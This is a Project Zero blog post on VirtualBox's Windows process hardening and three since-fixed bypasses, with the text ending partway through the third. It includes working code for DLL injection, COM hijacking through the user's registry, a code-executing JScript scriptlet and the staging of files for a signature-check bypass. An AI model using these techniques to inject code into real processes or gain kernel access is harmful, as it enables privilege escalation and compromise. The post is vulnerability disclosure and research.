Google Project Zero

Bypassing VirtualBox Process Hardening on Windows

Wed, 08/23/2017 - 12:10
Posted by James Forshaw, Project Zero
Processes on Windows are securable objects, which prevents one user logged into a Windows machine from compromising another user’s processes. This is a pretty important security feature, at least from the perspective of a non-administrator user. The security prevents a non-administrator user from compromising the integrity of an arbitrary process. This security barrier breaks down when trying to protect against administrators, specifically administrators with Debug privilege, as enabling this privilege allows the administrator to open any process regardless of the security applied to it.
There are cases where applications or the operating system want to actively defend processes from users such as administrators or even, in some cases, the same user as the running process who’d normally have full access. Protecting the processes is a pretty hard challenge if done entirely from user mode applications. Therefore many solutions use kernel support to perform the protection. In the majority of cases these sorts of techniques still have flaws, which we can exploit to compromise the “protected” process.
This blog post will describe the implementation of Oracle’s VirtualBox protected process and detail three different, but now fixed, ways of bypassing the protection and injecting arbitrary code into the process. The techniques I’ll present can equally be applied to similar implementations of “protected” processes in other applications.

Oracle VirtualBox Process Hardening

Protecting processes entirely in user mode is pretty much impossible; there are just too many ways of injecting content into a process. This is especially true when the process you’re trying to protect is running under the same context as the user you’re trying to block. An attacker could, for example, open a handle to the process with PROCESS_CREATE_THREAD access and directly inject a new thread. Or they could open a thread in the process with THREAD_SET_CONTEXT access and directly change the Instruction Pointer to jump to an arbitrary location. These are just the direct attacks. The attacker could also modify the registry or environment the process is running under, then force the process to load arbitrary COM objects, or Windows Hooks. The list of possible modifications is almost endless.
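To make the direct attacks concrete, here’s a minimal sketch of the classic remote thread injection this kind of hardening has to stop (my illustration, not VBOX-related code; the target PID and DLL path are whatever the attacker chooses):
#include <windows.h>
#include <cwchar>

// Classic DLL injection: write the DLL path into the target and start
// a remote thread at LoadLibraryW. Blocking exactly this is what the
// handle access restrictions described below are for.
bool InjectDll(DWORD pid, const wchar_t* dll_path) {
 HANDLE process = OpenProcess(PROCESS_CREATE_THREAD | PROCESS_VM_OPERATION |
                              PROCESS_VM_WRITE, FALSE, pid);
 if (!process)
   return false;
 size_t size = (wcslen(dll_path) + 1) * sizeof(wchar_t);
 void* remote = VirtualAllocEx(process, nullptr, size,
                               MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
 bool result = false;
 if (remote && WriteProcessMemory(process, remote, dll_path, size, nullptr)) {
   // kernel32 is mapped at the same base in every process, so
   // LoadLibraryW's address in our process is valid in the target too.
   LPTHREAD_START_ROUTINE start = (LPTHREAD_START_ROUTINE)GetProcAddress(
       GetModuleHandleW(L"kernel32"), "LoadLibraryW");
   HANDLE thread = CreateRemoteThread(process, nullptr, 0, start,
                                      remote, 0, nullptr);
   if (thread) {
     CloseHandle(thread);
     result = true;
   }
 }
 CloseHandle(process);
 return result;
}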
Therefore, VirtualBox (VBOX) enlists the help of the kernel to try to protect its processes. The source code refers to this as Process Hardening. VBOX tries to protect the processes from the same user the process is running under. A detailed rationale and technical overview is provided in source code comments. The TL;DR is that the protection gates access to the VBOX kernel drivers, which by design have a number of methods which can be used to compromise the kernel, or at least elevate privileges. This is why VBOX tries to prevent the current user compromising the process: getting access to the VBOX kernel driver would be a route to kernel or SYSTEM privileges. As we’ll see, though, while some of the protections also prevent administrators compromising the processes, that’s not the aim of the hardening code.
Multiple examples of issues with the driver and the protection from device access were discovered by my colleague Jann in VBOX on Linux. On Linux, VBOX limits access to the VBOX driver to root only, and uses SUID binaries to allow the VBOX user processes to get access to the driver before dropping privileges. On Windows, instead of SUID binaries, the VBOX driver uses kernel APIs to try to stop users and administrators opening protected processes and injecting code.
The core of the kernel component is in the Support\win\SUPDrv-win.cpp file. This code registers with two callback mechanisms supported by modern Windows kernels:
  1. PsSetCreateProcessNotifyRoutineEx - Driver is notified when a new process is created.
  2. ObRegisterCallbacks - Driver is notified when Process and Thread handles are created or duplicated.
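As a rough sketch of how a driver wires these up (my illustration of the two APIs, not VBOX’s actual code; the altitude string is a placeholder and the callback bodies are sketched after the access rights lists below):
#include <ntddk.h>

// Forward declarations; bodies are elided here.
OB_PREOP_CALLBACK_STATUS PreOpCallback(PVOID context,
                                       POB_PRE_OPERATION_INFORMATION info);
VOID CreateProcessNotify(PEPROCESS process, HANDLE pid,
                         PPS_CREATE_NOTIFY_INFO create_info);
PVOID g_ob_registration;

NTSTATUS RegisterHardeningCallbacks(void) {
 // Note: both APIs require the driver to be linked with /INTEGRITYCHECK.
 OB_OPERATION_REGISTRATION ops[2] = { 0 };
 OB_CALLBACK_REGISTRATION reg = { 0 };

 ops[0].ObjectType = PsProcessType;
 ops[0].Operations = OB_OPERATION_HANDLE_CREATE | OB_OPERATION_HANDLE_DUPLICATE;
 ops[0].PreOperation = PreOpCallback;
 ops[1] = ops[0];
 ops[1].ObjectType = PsThreadType;

 reg.Version = OB_FLT_REGISTRATION_VERSION;
 reg.OperationRegistrationCount = 2;
 RtlInitUnicodeString(&reg.Altitude, L"371000");  // Placeholder altitude.
 reg.OperationRegistration = ops;

 // Called for every process creation/exit; this is where per-process
 // protection state would be set up.
 NTSTATUS status = PsSetCreateProcessNotifyRoutineEx(CreateProcessNotify,
                                                     FALSE);
 if (!NT_SUCCESS(status))
   return status;
 return ObRegisterCallbacks(&reg, &g_ob_registration);
}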
The notification from PsSetCreateProcessNotifyRoutineEx is used to configure the protection structures for a new process. When the process subsequently tries to open a handle to the VBOX driver the hardening will only permit access after the following verification steps are performed in the call to supHardenedWinVerifyProcess:
  1. Ensure there are no debuggers attached to the process.
  2. Ensure there is only a single thread in the process, which should be the one opening the driver to prevent in-process races.
  3. Ensure there are no executable memory pages outside of a small set of permitted DLLs.
  4. Verify the signatures of all loaded DLLs.
  5. Check the main executable’s signature and that it is of a permitted type of executable (e.g. VirtualBox.exe).

Signature verification in the kernel is done using custom runtime code compiled into the driver. Only a limited set of Trusted Roots are permitted to be verified at this step, primarily Microsoft’s OS and Authenticode certificates as well as the Oracle certificate that all VBOX binaries are signed with. You can find the list of permitted certificates in the source repository.
The ObRegisterCallbacks notification is used to limit the maximum access any other user process on the system can be granted to the protected process. The ObRegisterCallbacks API was designed for anti-virus products to protect their processes from being injected into or terminated by malicious code. VBOX uses a similar approach and limits any handle to the protected process to the following access rights:
  • PROCESS_TERMINATE
  • PROCESS_VM_READ
  • PROCESS_QUERY_INFORMATION
  • PROCESS_QUERY_LIMITED_INFORMATION
  • PROCESS_SUSPEND_RESUME
  • DELETE
  • READ_CONTROL
  • SYNCHRONIZE

The permitted access rights give the user most of the typical rights they’d expect, such as being able to read memory, synchronize with the process and terminate it, but they do not allow injecting new code into the process. Similarly, access to threads is restricted to the following access rights, to prevent modification of a thread’s context or similar attacks.
  • THREAD_TERMINATE
  • THREAD_GET_CONTEXT
  • THREAD_QUERY_INFORMATION
  • THREAD_QUERY_LIMITED_INFORMATION
  • DELETE
  • READ_CONTROL
  • SYNCHRONIZE
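
A sketch of what the handle filtering looks like inside an ObRegisterCallbacks pre-operation callback (again my illustration, not VBOX’s actual code; IsProtectedProcess and IsThreadInProtectedProcess are hypothetical helpers):
#include <ntddk.h>

BOOLEAN IsProtectedProcess(PEPROCESS process);         // Hypothetical helper.
BOOLEAN IsThreadInProtectedProcess(PETHREAD thread);   // Hypothetical helper.

// Clamp the requested access on handle create/duplicate to the
// whitelists above; anything else is silently stripped.
OB_PREOP_CALLBACK_STATUS PreOpCallback(PVOID context,
                                       POB_PRE_OPERATION_INFORMATION info) {
 UNREFERENCED_PARAMETER(context);
 ACCESS_MASK allowed;
 if (info->ObjectType == *PsProcessType) {
   if (!IsProtectedProcess((PEPROCESS)info->Object))
     return OB_PREOP_SUCCESS;
   allowed = PROCESS_TERMINATE | PROCESS_VM_READ | PROCESS_QUERY_INFORMATION |
             PROCESS_QUERY_LIMITED_INFORMATION | PROCESS_SUSPEND_RESUME |
             DELETE | READ_CONTROL | SYNCHRONIZE;
 } else {
   if (!IsThreadInProtectedProcess((PETHREAD)info->Object))
     return OB_PREOP_SUCCESS;
   allowed = THREAD_TERMINATE | THREAD_GET_CONTEXT | THREAD_QUERY_INFORMATION |
             THREAD_QUERY_LIMITED_INFORMATION | DELETE | READ_CONTROL |
             SYNCHRONIZE;
 }
 if (info->Operation == OB_OPERATION_HANDLE_CREATE)
   info->Parameters->CreateHandleInformation.DesiredAccess &= allowed;
 else
   info->Parameters->DuplicateHandleInformation.DesiredAccess &= allowed;
 return OB_PREOP_SUCCESS;
}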

We can verify this access limitation by opening the VirtualBox process and one of its threads and seeing what access rights we’re granted. For example, the following picture highlights the access granted to the process and one of its threads.
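If you want to reproduce the check yourself, here’s a small C++ sketch; the granted access comes back in the handle’s basic object information (NtQueryObject and PUBLIC_OBJECT_BASIC_INFORMATION come from winternl.h, linking against ntdll.lib):
#include <windows.h>
#include <winternl.h>
#include <cstdio>
#pragma comment(lib, "ntdll.lib")

// Ask for everything, then query what the kernel (and VBOX's callback)
// actually granted us on the handle.
void PrintGrantedAccess(DWORD pid) {
 HANDLE process = OpenProcess(MAXIMUM_ALLOWED, FALSE, pid);
 if (!process) {
   printf("Open failed: %lu\n", GetLastError());
   return;
 }
 PUBLIC_OBJECT_BASIC_INFORMATION info = {};
 ULONG length = 0;
 // A non-negative NTSTATUS indicates success.
 if (NtQueryObject(process, ObjectBasicInformation, &info,
                   sizeof(info), &length) >= 0) {
   printf("Granted access: 0x%08lX\n", (ULONG)info.GrantedAccess);
 }
 CloseHandle(process);
}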

While the kernel callbacks prevent direct modification of the process, as well as a user trying to compromise the integrity of the process at startup, they do very little against runtime DLL injection such as through COM. The hardening implementation needs to decide what modules it’ll allow to be loaded into the process. The decision, fundamentally, is based on Authenticode code signing.
There are mitigation options to load only Microsoft signed binaries (such as PROCESS_MITIGATION_BINARY_SIGNATURE_POLICY). However, this policy isn’t very flexible. Therefore, protected VBOX processes install hooks on a few internal user-mode functions to verify the integrity of any DLL which is being loaded into memory. The hooked functions are:
  1. LdrLoadDll - Called to load a DLL into memory.
  2. NtCreateSection - Called to create an Image Section object for a PE file on disk.
  3. LdrRegisterDllNotification - This is a quasi-officially supported callback which notifies the application when a new DLL is loaded or unloaded.

These hooks expand the permitted set of signed DLLs which can be loaded. The kernel signature verification is okay for bootstrapping the process, as only Oracle and Microsoft code should be present. However, when it comes to running a non-trivial application (VirtualBox.exe is certainly non-trivial) you’re likely to need to load third-party signed code such as GPU drivers. As the hooks are in user mode it’s easier to call the system WinVerifyTrust API, which will verify certificate chains using the system certificate stores as well as handling the verification of files signed in a Catalog file.
If the DLL being loaded doesn’t meet VBOX’s expected criteria for signing then the user-mode hooks will reject loading that DLL. VBOX still doesn't completely trust the user; WinVerifyTrust will chain certificates back to a root certificate in the user’s CA certificates. However, VBOX will only trust system CA certificates. As a non-administrator cannot add a new trusted root certificate to the system’s list of CA certificates this should severely limit the injection of malicious DLLs.
You could get a real code signing certificate, which should also be trusted, but the assumption is malicious code wouldn’t want to go down that route. Even if the code is signed, the loader also checks that the DLL file is owned by the TrustedInstaller user. This is checked in supHardNtViCheckIsOwnedByTrustedInstallerOrSimilar. A normal user should not be able to change the owner of a file to anything but themselves, which limits the impact of allowing any signed file to load.
The VBOX code does have a function, supR3HardenedWinIsDesiredRootCA, which is supposed to restrict which root certificates are permitted. In official builds the function’s whitelist of specific CAs is commented out. There’s a blacklist of certificates; however, unless your company is called “U.S. Robots and Mechanical Men, Inc” the blacklist won’t affect you.
Even with all this protection the process isn’t secure against an administrator. While an administrator can’t bypass the security on opening the process, they can install a local machine Trusted Root CA certificate and sign a DLL, set its owner and force it to be loaded. This will bypass the image verification and load into the verified VBOX process.
In summary the VBOX hardening is attempting to provide the following protections:
  1. Ensure that no code is injected into protected binaries during initialization.
  2. Prevent user processes from opening “writable” handles to protected processes or threads which would allow arbitrary code injection.
  3. Prevent injection of untrusted DLLs through normal loading routes such as COM.

This whole process is likely to have some bugs and edge cases. There are so many different verification checks which must all fit together. So, assuming we don’t want to get a code signing certificate and we don’t have administrator rights, how can we get arbitrary code running inside a protected VBOX process? We’ll focus primarily on the third protection in the list, as this is perhaps the most complex part of the protection and therefore is likely to have the most issues.

Exploiting the Chain-of-Trust in COM Registration

The first bug I’m going to describe was fixed as CVE-2017-3563 in VBOX version 5.0.38/5.1.20. This issue exploits the chain-of-trust for DLL loading to trick VBOX into loading Microsoft signed DLLs which just happen to allow untrusted arbitrary code execution.
If you run Process Monitor against the protected VBOX process you’ll notice that it uses COM, specifically it uses the VirtualBoxClient class which is implemented in the VBoxC.dll COM server.

The nice thing about COM server registration, at least from the perspective of an attacker, is that the registration for a COM object can be in one of two places: the user’s registry hive, or the local machine registry hive. For reasons of compatibility the user’s hive is checked first, before falling back to the local machine hive. Therefore it’s possible to override a COM registration with only normal user permissions, so when an application tries to load the designated COM object it will instead load whatever DLL we’ve overridden it with.
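A sketch of what such an override amounts to (my illustration; the CLSID and DLL path are placeholders for whichever class you want to hijack):
#include <windows.h>
#include <string>
#include <cwchar>

// Write an InprocServer32 entry into HKCU so it shadows the HKLM
// registration of the same class.
bool HijackComClass(const wchar_t* clsid, const wchar_t* dll_path) {
 std::wstring key_path = L"Software\\Classes\\CLSID\\";
 key_path += clsid;
 key_path += L"\\InprocServer32";
 HKEY key;
 // HKCU\Software\Classes is consulted before HKLM\Software\Classes.
 if (RegCreateKeyExW(HKEY_CURRENT_USER, key_path.c_str(), 0, nullptr, 0,
                     KEY_WRITE, nullptr, &key, nullptr) != ERROR_SUCCESS)
   return false;
 RegSetValueExW(key, nullptr, 0, REG_SZ, (const BYTE*)dll_path,
                (DWORD)((wcslen(dll_path) + 1) * sizeof(wchar_t)));
 // In-process servers also need a threading model.
 RegSetValueExW(key, L"ThreadingModel", 0, REG_SZ, (const BYTE*)L"Both",
                (DWORD)(5 * sizeof(wchar_t)));
 RegCloseKey(key);
 return true;
}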
Hijacking COM objects is not a new technique; it’s been known for many years, especially for the purposes of malware persistence. It’s seen a resurgence of late because of the renewed interest in all things COM. However, it’s rare that COM hijacking is of importance for elevation of privilege outside of UAC bypasses.
As an aside, the connection between UAC and COM hijacking is the COM runtime actively tries to prevent the hijack being used as an EoP route by disabling certain User registry lookups if the current process is elevated. Of course it wasn’t always successful. This behavior only makes sense if you view UAC through the prism of it being a defendable security boundary, which Microsoft categorically claim it’s not and never was. For example this blog post from early 2007 specifically states this behavior is to prevent Elevation of Privilege. I think the COM lookup behavior is one of the clearest indicators that UAC was originally designed to be a security boundary. It failed to meet the security bar and so was famously retconned into helping “developers” write better code.
If we could replace the COM registration with our own code we should be able to get code execution inside the hardened process. In theory all the hardening signing checks should stop us from loading untrusted code, but in research it’s always worth trying something which you believe should fail, just in case; sometimes you get a nice surprise, and at minimum it’ll give you insight into how the protection really works. I registered a COM object to hijack the VirtualBoxClient class in the user’s hive and pointed it at an unsigned DLL (full disclosure: I used an admin account to tweak the Owner to TrustedInstaller, just to test). When I tried to start a Virtual Machine I got the following dialog.

It’s possible that I just made a mistake in the COM registration; however, testing the COM object in a separate application worked as expected. Therefore this error is likely a result of failing to load the DLL. Fortunately, VBOX is generous and enables a log of all Process Hardening events by default. It’s named VBoxHardening.log and is located in the Logs folder of the Virtual Machine you tried to start. Searching for the name of the DLL we find the following entries (heavily modified for brevity):
supHardenedWinVerifyImageByHandle: -> -22900 (c:\dummy\testdll.dll)
supR3HardenedScreenImage/LdrLoadDll: c:\dummy\testdll.dll: Not signed.
supR3HardenedMonitor_LdrLoadDll: rejecting 'c:\dummy\testdll.dll'
supR3HardenedMonitor_LdrLoadDll: returns rcNt=0xc0000190
So clearly our test DLL isn’t signed and so the LdrLoadDll hook rejects it. The LdrLoadDll hook returns an error code which propagates back up to the COM DLL loader, which results in COM thinking the class doesn’t exist.
While it’s not surprising that it wasn’t as simple as just specifying our own DLL (and don’t forget we cheated by setting the Owner), it at least gives us hope, as this result means the VBOX process will use our hijacked COM registration. All we need therefore is a COM object which meets the following criteria:
  1. It’s signed by a trusted certificate.
  2. It’s owned by TrustedInstaller.
  3. When loaded will do something that allows for arbitrary code execution in the process.

Criteria 1 and 2 are easy to meet: any Microsoft COM object on the system is signed by a trusted certificate (one of Microsoft’s publisher certificates) and is almost certainly owned by TrustedInstaller. However, criterion 3 would seem much more difficult to meet: a COM object is usually implemented inside its DLL, and we can’t modify the DLL itself, otherwise it would no longer be signed. It just so happens that there is a Microsoft signed COM object installed by default which will allow us to meet criterion 3: Windows Script Components (WSC).
WSC, also sometimes called Scriptlets, are having a good run at the moment. They can be used as an AppLocker bypass as well as being loaded from HTTP URLs. What’s of most interest in this case is that they can also be registered as COM objects.
A registered WSC consists of two parts:
  1. The WSC runtime scrobj.dll which acts as the in-process COM server.
  2. A file which contains the implementation of the Scriptlet in a compatible scripting language.

When an application tries to load the registered class, scrobj.dll gets loaded into memory. The COM runtime requests a new object of the required class, which causes the WSC runtime to go back to the registry to look up the URL to the implementation Scriptlet file. The WSC runtime then loads the Scriptlet file and executes the embedded script contained in the file in-process. The key here is that as long as scrobj.dll (and any associated script language libraries such as JScript.dll) are valid signed DLLs from VBOX’s perspective, the script code will run, as it can never be checked by the hardening code. This would get arbitrary code running inside the hardened process. First let’s check that scrobj.dll is likely to be allowed to be loaded by VBOX. The following screenshot shows the DLL is both signed by Microsoft and owned by TrustedInstaller.

So what does a valid Scriptlet file look like? It’s a simple XML file, I’m not going to go into much detail about what each XML element means, other than to point out the script block which will execute arbitrary JScript code. In this case all this Scriptlet will do when loaded is start the Calculator process.
<scriptlet>
 <registration
   description ="Component"
   progid="Component"
   version="1.00"
   classid="{DD3FC71D-26C0-4FE1-BF6F-67F633265BBA}"
 />
 <public/>
 <script language = "JScript" >
 <![CDATA[
 new ActiveXObject('WScript.Shell').Exec('calc');
 ]]>
 </script>
</scriptlet>
If you’ve written much code in JScript or VBScript you might now notice a problem: these languages can’t do that much unless it’s implemented by a COM object. In the example Scriptlet file we can’t create a new process without loading the WScript.Shell COM object and calling its Exec method. In order to talk to the VBOX driver, which is the whole purpose of injecting code in the first place, we’d need a COM object which gives us that functionality. We can’t implement the code in another COM object as that wouldn’t pass the image signing checks we’re trying to bypass. Of course, there are always memory corruption bugs in scripting engines but, as everyone already knows by now, I’m not a fan of exploiting memory corruptions, so we need some other way of getting fully arbitrary code execution. Time to bring in the big guns, the .NET Framework.
The .NET runtime loads code into memory using the normal DLL loading routines. We can’t therefore load a .NET DLL which isn’t signed into memory as that would still get caught by VBOX’s hardening code. However, .NET does support loading arbitrary code from an in-memory array using the Assembly::Load method and once loaded this code can basically act as if it was native code, calling arbitrary APIs and inspecting/modifying memory. As the .NET framework is signed by Microsoft all we need to do is somehow call the Load method from our Scriptlet file and we can get full arbitrary code running inside the process.
Where do we even start on achieving this goal? As I showed in a previous blog post, it’s possible to expose .NET objects as COM objects through registration, and by abusing Binary Serialization we can load arbitrary code from a byte array. Many core .NET runtime classes are automatically registered as COM objects which can be loaded and manipulated by a scripting engine. The big question can now be asked: is BinaryFormatter exposed as a COM object?

Why, yes it is. BinaryFormatter is a .NET object that a scripting engine can load and interact with via COM. We could now take the final binary stream from my previous post and execute arbitrary code from memory. In the previous blog post the execution of the untrusted code had to occur during deserialization, in this case we can interact with the results of deserialization in a script which can make the serialization gadgets we need much simpler.
In the end I chose to deserialize a Delegate object which, when executed by the script engine, would load an Assembly from memory and return the Assembly instance. The script engine could then instantiate an instance of a Type in that Assembly and run arbitrary code. It sounds simple in principle; in reality there are a number of caveats. Rather than bog down this blog post with more detail than necessary, the tool I used to generate the Scriptlet file, DotNetToJScript, is available so you can read how it works yourself. Also the PoC is available on the issue tracker here. The chain from the JScript component to being able to call the VBOX driver looks something like the following:


I’m not going to go into what you can now do with the VBOX driver once you’ve got arbitrary code running in the hardened process; that’s certainly a topic for another post. Although you might want to look at one of Jann’s issues which describes what you might do on Linux.
How did Oracle fix the issue? They added a blacklist of DLLs which are not allowed to be loaded by the hardened VBOX process. The only DLL currently in that list is scrobj.dll. The list is checked after the verification of the file has taken place and covers both the current filename as well as the internal Original Filename in the version resources. This prevents you just renaming the file to something else, as the version resources are part of the signed PE data and so cannot be modified without invalidating the signature. In fairness to Oracle I’m not sure there was any other sensible way of blocking this attack vector other than a DLL blacklist.

Exploiting User-Mode DLL Loading Behavior

The second bug I’m going to describe was fixed as CVE-2017-10204 in VBOX version 5.1.24. This issue exploits the behavior of the Windows DLL loader and some bugs in VBOX to trick the hardening code into allowing an unverified DLL to be loaded into memory and executed.
While this bug doesn’t rely on exploiting COM loading as such, the per-user COM registration is a convenient technique to get LoadLibrary called with an arbitrary path. Therefore we’ll continue to use the technique of hijacking the VirtualBoxClient COM object and just use the in-process server path as a means to load the DLL.
LoadLibrary is an API with a number of well known, but strange behaviors. One of the more interesting from our perspective is the behavior with filename extensions. Depending on the extension the LoadLibrary API might add or remove the extension before trying to load the file. I can summarise it in a table, showing the file name as passed to LoadLibrary and the file it actually tries to load.
Original File Name      Loaded File Name
c:\test\abc.dll         c:\test\abc.dll
c:\test\abc             c:\test\abc.dll   (*)
c:\test\abc.blah        c:\test\abc.blah
c:\test\abc.            c:\test\abc       (*)
I’ve marked with (*) the two important cases. These are the cases where the filename passed into LoadLibrary doesn’t match the filename which eventually gets loaded. The problem for any code trying to verify a DLL file before loading it is that CreateFile doesn’t follow these rules, so in the marked cases, if you opened the file for signature verification using the original file name, you’d verify a different file to the one which eventually gets loaded.
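You can observe the mismatch with a trivial test (paths illustrative): place two different DLLs at c:\test\abc and c:\test\abc.dll, then:
#include <windows.h>
#include <cstdio>

// Load the extension-less name and see which file is actually mapped.
int main() {
 HMODULE mod = LoadLibraryW(L"c:\\test\\abc");
 if (mod) {
   wchar_t loaded[MAX_PATH];
   GetModuleFileNameW(mod, loaded, MAX_PATH);
   wprintf(L"Loaded: %s\n", loaded);  // Prints c:\test\abc.dll.
   FreeLibrary(mod);
 }
 return 0;
}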
In Windows there’s usually a clear separation between Kernel32 code, which tends to deal with the many weird behaviors Win32 has built up over the years, and the “clean” NT layer exposed by the kernel through NTDLL. Therefore, as LoadLibrary is in Kernel32 and LdrLoadDll (which is the function the hardening hooks) is in NTDLL, you’d expect this weird extension behavior to be handled in the former. Let’s look at a very simplified version of LoadLibrary to see if that’s the case:
HMODULE LoadLibrary(LPCWSTR lpLibFileName)
{
 UNICODE_STRING DllPath;
 HMODULE ModuleHandle;
 ULONG Flags = 0; // Flags omitted for brevity.

 RtlInitUnicodeString(&DllPath, lpLibFileName);  
 if (NT_SUCCESS(LdrLoadDll(DEFAULT_SEARCH_PATH,
     &Flags, &DllPath, &ModuleHandle))) {
   return ModuleHandle;
 }
 return NULL;
}
We can see in this code that for all intents and purposes LoadLibrary is just a wrapper around LdrLoadDll. While in reality it’s more complex than that, the takeaway is that LoadLibrary does not modify the path it passes to LdrLoadDll in any way other than converting it to a UNICODE_STRING. Therefore, perhaps if we specify a DLL to load without an extension, VBOX will check the extension-less file for the signature but LdrLoadDll will instead load the file with the .DLL extension.
Before we can test that, we’ve got another problem to deal with: the requirement that the file is owned by TrustedInstaller. For the file we want VBOX to signature check, all we need to do is give an existing valid, signed file a different filename. This is what hard links were created for; we can create a different name in a directory we control which actually links to a system file which is signed and also maintains its original security descriptor, including the owner. The trouble with hard links is, as I described in a blog post almost 2 years ago, that while Windows supports creating links to system files you can’t write to, the Win32 APIs (and by extension the easy-to-access “mklink” command in the CMD shell) require the file to be opened with FILE_WRITE_ATTRIBUTES access. Instead of using another application to create the link we’ll just copy the file; however, the copy will no longer have the original security descriptor and so will no longer be owned by TrustedInstaller. To get around that, let’s look at the checking code to see if there’s a way around it.
The main check for the Owner is in supHardenedWinVerifyImageByLdrMod. Almost the first thing that function does is call supHardNtViCheckIsOwnedByTrustedInstallerOrSimilar, which we saw earlier. However, as the comments above the check indicate, the code will also allow files under the System32 and WinSxS directories to not be owned by TrustedInstaller. This is a bus-sized hole in the point of the check, as all we need is one writeable directory under System32. We can find some by running the Get-AccessibleFile cmdlet in my NtObjectManager PS module.

There are plenty to choose from; we’ll just pick the Tasks folder as it’s guaranteed to always be there. So the exploit should be as follows:
  1. Copy a signed binary to %SystemRoot%\System32\Tasks\Dummy\ABC
  2. Copy an unsigned binary to %SystemRoot%\System32\Tasks\Dummy\ABC.DLL
  3. Register a COM hijack pointing the in-process server to the signed file path from 1.
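
A sketch of that setup (all paths are illustrative; the signed source can be any Microsoft-signed DLL, and the COM hijack’s InprocServer32 value would then point at the extension-less path):
#include <windows.h>

// Stage the two files; the extension-less one is verified, the .DLL
// one is loaded.
bool SetupExtensionBypass() {
 const wchar_t* dir = L"c:\\windows\\system32\\tasks\\dummy";
 if (!CreateDirectoryW(dir, nullptr) &&
     GetLastError() != ERROR_ALREADY_EXISTS)
   return false;
 // What VBOX's hardening verifies: any Microsoft signed DLL.
 if (!CopyFileW(L"c:\\path\\to\\signed.dll",
                L"c:\\windows\\system32\\tasks\\dummy\\ABC", FALSE))
   return false;
 // What LdrLoadDll actually maps: our unsigned payload.
 return CopyFileW(L"c:\\path\\to\\payload.dll",
                  L"c:\\windows\\system32\\tasks\\dummy\\ABC.DLL",
                  FALSE) != 0;
}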

If you try to start a Virtual Machine you’ll find that this trick works. The hardening code checks the ABC file for the signature, but LdrLoadDll ends up loading ABC.DLL. Just to check we didn’t exploit something else, let’s look at the hardening log:
\..\Tasks\dummy\ABC: Owner is not trusted installer
\..\Tasks\dummy\ABC: Relaxing the TrustedInstaller requirement for this DLL (it's in system32).
supHardenedWinVerifyImageByHandle: -> 0 (\..\Tasks\dummy\ABC)
supR3HardenedMonitor_LdrLoadDll: pName=c:\..\tasks\dummy\ABC [calling]
The first two lines indicate the bypass of the Owner check as we expected. The second two indicate it’s verified the ABC file and therefore will call the original LdrLoadDll, which ultimately will append the extension and try to load ABC.DLL instead. But, wait, how come the other checks in NtCreateSection and the loader callback don’t catch loading a completely different file? Let’s search for any instance of ABC.DLL in the rest of the hardening log to find out:
\..\Tasks\dummy\ABC.dll: Owner is not trusted installer
\..\Tasks\dummy\ABC.dll: Relaxing the TrustedInstaller requirement for this DLL (it's in system32).
supHardenedWinVerifyImageByHandle: -> 22900 (\..\Tasks\dummy\ABC.dll)
supR3HardenedWinVerifyCacheInsert: \..\Tasks\dummy\ABC.dll
supR3HardenedDllNotificationCallback: c:\..\tasks\dummy\ABC.DLL
supR3HardenedScreenImage/LdrLoadDll: cache hit (Unknown Status 22900) on \..\Tasks\dummy\ABC.dll
Again the first two lines indicate we bypassed the Owner check because of our file's location. The next line, supHardenedWinVerifyImageByHandle, is more interesting however. This function verifies the image file. If you look back at the earlier log of this check you’ll find it returned the result -22900, which was considered an error. However in this case it’s returning 22900, and as VBOX treats any result >= 0 as success, the hardening code gets confused and assumes the file is valid. The negative error code is VERR_LDRVI_NOT_SIGNED in the source code, whereas the positive “success” code is VINF_LDRVI_NOT_SIGNED.
This seems to be a bug in the verification code when it’s called while holding the DLL Loader Lock, such as in the NtCreateSection hook. The code can’t call WinVerifyTrust in case it tries to load another DLL, which would cause a deadlock. What would normally happen is VINF_LDRVI_NOT_SIGNED is returned from the internal signature checking implementation. That implementation can only handle files with embedded signatures, so if a file isn’t signed it returns that information code to get the verification code to check if the file is catalog signed. What’s supposed to happen is WinVerifyTrust is called, and if the file is still not signed it returns the error code; however, as WinVerifyTrust can’t be called due to the lock, the information code gets propagated to the caller, which assumes it’s a success code.
The final question is why the Loader Callback doesn’t catch the unsigned file. VBOX implements a signed-file cache based on the path to avoid checking a file multiple times. When the call to supHardenedWinVerifyImageByHandle was taken to be a success, the verifier called supR3HardenedWinVerifyCacheInsert to add a cache entry for this path with the “success” code. We can see that in the Loader Callback it tries to verify the file but gets back a “success” code from the cache, so it assumes everything's okay, and the loading process is allowed to complete.
Quite a complex set of interactions to get code running. How did Oracle fix this issue? They just add the DLL extension if there’s no extension present. They also handle the case where the filename has a trailing period (which would be removed when loading the DLL).

Exploiting Kernel-Mode Image Loading Behavior

The final bug I’m going to describe was fixed as CVE-2017-10129 in VBOX version 5.1.24. This isn’t really a bug in VBOX as much as it’s an unexpected behavior in Windows.
Through all this it’s worth noting that there’s an implicit race condition in what the hardening code is trying to do: if you could change the file between the verification point and the point where the file is mapped, you’d bypass the checks. In theory you could do this to VBOX, but the timing window is somewhat short. You could use OPLOCKs and the like, but it’s a bit of a pain; instead it’d be nice to get the TOCTOU attack for free.
Let’s look at how image files are handled in the kernel. Mapping an image file on Windows is expensive: the OS doesn’t use position-independent code and so can’t just map the DLL into memory as a simple file. Instead the DLL must be relocated to a specific memory address. This requires modifying pages of the DLL file to ensure any pointers are correctly fixed up. This is even more important when you bring ASLR into the mix, as ASLR will almost always force a DLL to be relocated from its base address. Therefore, Windows caches an instance of an image mapping whenever it can; this is why the load address of a DLL doesn’t change between processes on the same system: it’s using the same cached image section.
The caching is actually in part under control of the filesystem driver. When a file is opened the IO manager will allocate a new instance of the FILE_OBJECT structure and pass it to the IRP_MJ_CREATE handler for the driver. One of the fields that the driver can then initialize is the SectionObjectPointer. This is an instance of the SECTION_OBJECT_POINTERS structure, which looks like the following:
struct SECTION_OBJECT_POINTERS {
 PVOID DataSectionObject;
 PVOID SharedCacheMap;
 PVOID ImageSectionObject;
};
The fields themselves are managed by the Cache manager, but the structure itself must be allocated by the File System driver. Specifically, there should be one allocation per file in the filesystem; while each open instance of a specific file will have a unique FILE_OBJECT, the SectionObjectPointer should be the same. This allows the Cache manager to fill in the different fields and then reuse them if another instance of the same file is mapped.
The important field here is ImageSectionObject, which contains the cached data for the mapped image section. I’m not going to delve into the details of what the ImageSectionObject pointer contains as it’s not really relevant. The important thing is that if the SectionObjectPointer, and by extension the ImageSectionObject pointer, is the same for a FILE_OBJECT instance, then mapping that file as an image will map the same cached image mapping. However, as the ImageSectionObject pointer is not used when reading from a file, it doesn’t follow that what’s actually cached still matches what’s on disk.
